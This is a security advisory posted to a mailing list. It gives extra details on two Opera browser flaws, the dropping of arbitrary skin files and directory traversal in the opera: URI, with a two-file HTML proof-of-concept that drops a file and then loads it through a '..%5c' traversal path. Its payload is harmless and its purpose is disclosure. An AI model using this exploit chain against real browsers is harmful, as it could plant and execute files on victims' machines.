Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit)

[S G Masood <sgmasood () yahoo com>]

__________________________________
Do you Yahoo!?
Protect your identity with Yahoo! Mail AddressGuard
http://antispam.yahoo.com/whatsnewfree




Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit):
==================================================================================




ADDITIONAL DETAILS:


While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER" option is selected, the "opera7/profile" folder is 
stored in the "<username>/application data/opera7" location instead of in the Opera root folder. The "profile" folder 
contains user specific data for different Opera users. Therefore, each user has a different "profile" folder in his 
"<username>/application data/opera7" folder.

Folders of interest to us in which configuration files are automatically downloaded and stored(like skin, toolbar, 
mouse, etc.) are subfolders of the "profile" folder and hence are also moved to this location.

In this scenario, the arbitrary files can still be dropped in the respective folders. However, for executing the files, 
the <username> variable must be known. Other methods of exploiting this scenario may come up later.



SIMPLE PoC EXPLOIT:


This is a simple PoC for the two Opera vulnerabilities detailed in the "Opera Skinned : Arbitrary File Dropping And 
Execution" and "Opera Web Browser Directory Traversal in Internal URI Protocol" advisories.

"main.htm" is the file which is to be loaded into the browser remotely. This file opens "skin.htm" in a new window. The 
Content-Type of "skin.htm" should be set as "application/x-opera-skin" on the server. When skin.htm is opened in this 
way, it is dropped in the "<opera dir>/profile/skin/" folder on the victim's machine. This demonstrates the first 
vulnerability.

After dropping skin.htm, main.htm is redirected to the local skin.htm. The path of skin.htm is calculated using the 
second vulnerability. This demonstrates the second vulnerability.


NOTE: Dont forget to set the Content-Type as "application/x-opera-skin" for skin.htm.


---------------START MAIN.HTM----------------


<html>

<head>

<script language="javascript">

var win=open("skin.htm")                   // The server should return content-type as // "application/x-opera-skin" 
for "Skin.htm". "Skin.htm" will be dropped in the "&lt;opera // dir&gt;/profile/skin/" folder.

setTimeout("redir()",2000) //modify according to your situation.


function redir(){

window.location.href="opera:/help/..%5c/profile/skin/skin.htm"             //This uses the // directory traversal flaw 
mentioned in advisory 2 to get the path of the dropped file. In this // case, it is skin.htm.

}


</script>

</head>


<body>

<h1>This is the main file</h1>

</body>

</html>



---------------END MAIN.HTM----------------


---------------START SKIN.HTM----------------


<body>

<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "&lt;opera dir&gt;/profile/skin/" in localhost.

</body>


---------------END SKIN.HTM----------------





--
S.G.Masood
sgmasood () yahoo com

Hyderabad,
India.



DISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the general public about a security issue. 
Use this information at your own discretion.

In brief, the author is not responsible for any use, misuse, abuse of this information. Also, this information is 
provided "as is" without any warranty of any kind.